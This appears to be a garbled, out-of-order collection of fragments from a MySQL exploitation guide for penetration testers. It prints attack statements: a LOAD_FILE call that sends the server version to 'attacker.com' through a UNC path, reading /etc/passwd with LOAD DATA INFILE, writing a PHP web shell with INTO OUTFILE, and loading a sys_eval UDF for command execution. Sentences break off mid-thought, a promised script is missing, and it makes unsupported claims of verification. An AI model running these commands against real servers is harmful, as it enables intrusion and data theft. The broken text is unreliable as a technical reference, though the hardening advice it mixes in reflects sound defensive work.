If the database host also serves web traffic and you can locate the web root, you can write a payload to achieve Remote Code Execution (RCE).
If secure_file_priv is disabled (empty), an attacker can use the SELECT ... INTO OUTFILE statement.
: Remove the FILE and SUPER privileges from standard application users. Ensure application accounts only possess DML permissions ( SELECT , INSERT , UPDATE , DELETE ) on their specific target databases.
In older, unpatched systems running specific versions of MariaDB and MySQL (around versions 5.1 to 5.5), a critical flaw allows authentication bypass due to a bad cast in the checking function. If a user inputs a password, there is a 1-in-256 chance that the memeory comparison returns true regardless of accuracy.
SELECT LOAD_FILE(CONCAT('\\\\', version(), '.attacker.com\\test')); mysql hacktricks verified
Database exploitation is a critical phase of security assessments. MySQL remains one of the most widely deployed relational database management systems globally, making it a frequent target for penetration testers and red teamers.
All techniques marked with a checkmark have been against current exploit code, CVEs from 2025‑2026, and penetration testing reports.
: Attackers can chain a UNION‑based injection to extract sensitive files:
In specific older versions of MySQL and MariaDB, a flaw in the password checking protocol allowed users to log in without knowing the password. By flooding the login prompt, the driver would accidentally accept a wrong password hash roughly 1 out of every 256 attempts. You can exploit this via a simple Bash loop: If the database host also serves web traffic
Exploiting insecure defaults & exposed ports
: Bind MySQL exclusively to 127.0.0.1 or internal private subnets via the bind-address directive in my.cnf . Never expose port 3306 directly to the internet.
mysql -u root -h mysql -u root -p -h # Press Enter when prompted for password Use code with caution. Automated Brute Forcing
variable is empty or misconfigured, attackers can interact with the host OS: Reading Files LOAD DATA INFILE '/etc/passwd' INTO TABLE temp_table; to exfiltrate system configuration files. Writing Shells : Remove the FILE and SUPER privileges from
CREATE FUNCTION sys_eval RETURNS string SONAME 'udf_sys_exec.so'; Use code with caution.
Once access is gained (whether via low-privilege or administrative accounts), profiling the database structure and system configuration is vital. Core Discovery Commands Run these standard queries to map out the environment:
UNION SELECT 1, '', 3 INTO OUTFILE '/var/www/html/shell.php'; -- Use code with caution. 4. Database Privilege Escalation and RCE via UDF
After cross‑referencing more than 40 sources – HackTricks mirrors, exploit‑DB entries, CVE databases (2025‑2026), penetration testing walkthroughs, and CTF write‑ups – :
.